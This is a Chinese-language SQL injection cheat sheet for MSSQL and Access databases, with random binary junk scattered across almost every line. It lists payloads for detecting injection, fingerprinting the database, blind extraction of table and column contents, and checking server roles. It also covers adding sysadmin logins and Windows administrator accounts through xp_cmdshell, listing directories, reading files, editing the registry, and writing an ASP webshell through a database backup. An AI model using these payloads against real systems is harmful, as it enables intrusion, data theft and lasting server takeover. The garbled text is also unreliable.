1.判断是否有注入;and 1=1 ;and 1=2 �
6h
�N~�<
2.初步判断是否是mssql ;and user>0 d:0�RDK-}s
n4%��|F'ma
3.注入参数是字符'and [查询条件] and ''=' cL&V2�I5�O
/"?y @;Y�~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' p.q�:vI$J
B&0^�3iKFi
5.判断数据库系统 {
p {a0*$5
c�,KT1m�e
;and (select count(*) from sysobjects)>0 mssql L0�S�eG�:�
lTPo2-j/eK
;and (select count(*) from msysobjects)>0 access P����Y:
�l
@EzSo�sm�F
�<n�s[(
�Q
k�r��Z J"`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 m~~_�iz_*
��1T�fK"\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ]��]�$s"F<
f�GJ���PZe
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ]{���V��q;
{*H�&�NI��
9.(1)猜字段的ascii值(access) �I#�Ay)+�D
l��?~SH[V�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 o)'T��#uK�
xA]CtB�*o7
(2)猜字段的ascii值(mssql) ���(7��x�5
I,vy�__�sZ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <3�z]d?u��
nnI��B��N4
10.测试权限结构(mssql) s
S8Z5��k;
Nh�~ Hh(��
8qn�1?��Lb
H
r�?�G_�L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- O�^hWG ~�o
[o�<R#f`�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- X>2_G�ol!�
aM?Xi6
U5�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- VYkO�JAEBg
�j[gX�"PdQ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,Cj1S7GFR
_)Q)�tOW��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �3�1�4PcSc
�0/S|�P1!b
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �}N(-e�$88
���V0z.w:-
;and 1=(select IS_MEMBER('db_owner'));-- �oE��U� %"
EP&�iG�%(k
!S�fy�'�v.
\-N
�4�G1�
11.添加mssql和系统的帐户 �FGu:8�`c9
+4f>njARIb
;exec master.dbo.sp_addlogin username;-- br+{23&1R#
;exec master.dbo.sp_password null,username,password;-- P0��S��;aE
mf6?8�!O}>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Ji4c8*&Jpc
�X|t�?{.�p
;exec master.dbo.xp_cmdshell 'net user username password 6���Lz{/l8
[c]X�)
@#S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ~"!F����&
g<{/m��xv/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +Sv`2��3G@
:.f =>s]�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ^�;�n,C�+�
Lg��pj<H�[
Bu�">)�AnN
~���Y�@��(
12.(1)遍历目录 Y�uSe~~F)j
]�7�8���I�
;create table dirs(paths varchar(100), id int) {��^�>m3
%h 6��?�/�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �rB��a <s�
]=�of=T�:
;and (select top 1 paths from dirs)>0 }"w���WSPD
_C~e(�/=z�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) %�r�ibxgmd
a{^����[<�
0vNE�l3f'O
Q]���Q�� i
(2)遍历目录 �4�_�3Jpz*
'��x{g P?.
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- R<{b�b��'�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 C%t~?jEK~^
s�t� �P~/}
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �&0SX*�KyI
^��'!]��|^
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �!�}|�n3wQ
�)��a.Y$![
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��_�H�X�1E
oh:q:���St
=�($��R�T�
u$���$@Hw
13.mssql中的存储过程 nx`!B�NL'V
:TJv<�NZi'
xp_regenumvalues 注册表根键, 子键 6js�9�4ko[
V|KYkEl
r1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 -�;&a��U;k
eU�'D�Q�p*
xp_regread 根键,子键,键值名 ew�g&DBbN"
7Y�sB��wo�
;exec xp_regread 1OK,��r` �
c�e th�)Xm
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 {j@
S<�PD
|�F[E h
�~
xp_regwrite 根键,子键, 值名, 值类型, 值 |>@Gb�gw^M
IJ2��]2F�I
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �-jn�x0{/�
Q*��}#?�g�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �!cPiH6e�O
]�C_g:�|�q
xp_regdeletevalue 根键,子键,值名 �?F�]Yebp^
��:L#�t?�~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �H�$�TYp��
R+k-mbvn�t
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 yPrp:%�P�S
'b#RfF,7H}
���5�('_7l
H�Kr")��K%
14.mssql的backup创建webshell .WM�0x{t�/
CAyV#�7[�0
use model 7���sKN�`
J.�Mj7�6\_
create table cmd(str image); �YY�-{&+,
@�A�a$�k:_
insert into cmd(str) values (''); �0�jC�YO�l
tz0@�csXV�
backup database model to disk='c:\l.asp'; {T�s@#V=:�
dd1m~Gm���
@/h_v#�W�
�CqX2R:�#
15.mssql内置函数 �`� W��$��
cs�E 9N�s�
;and (select @@version)>0 获得Windows的版本号 4GWt.+{J$�
#PUvrA2Z�l
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �}&#R-eQT
����1~:7�W
;and (select user_name())>0 爆当前系统的连接用户 "&�?F��6Pi
Q�j: D�=j8
;and (select db_name())>0 得到当前连接的数据库 2�?YN8
n9n
2|�]��$hjs
��S|!)_RL
�m�^�cr-'
16.简洁的webshell ��=H6"\`W�
{�a`t�1oX(
use model x*t�d
nor&
'�L�u7c�b^
create table cmd(str image); P5s'cP���X
n��I�dB,�
insert into cmd(str) values (''); gT�Wl];xja
P#-9{T���
backup database model to disk='g:\wwwtest\l.asp';
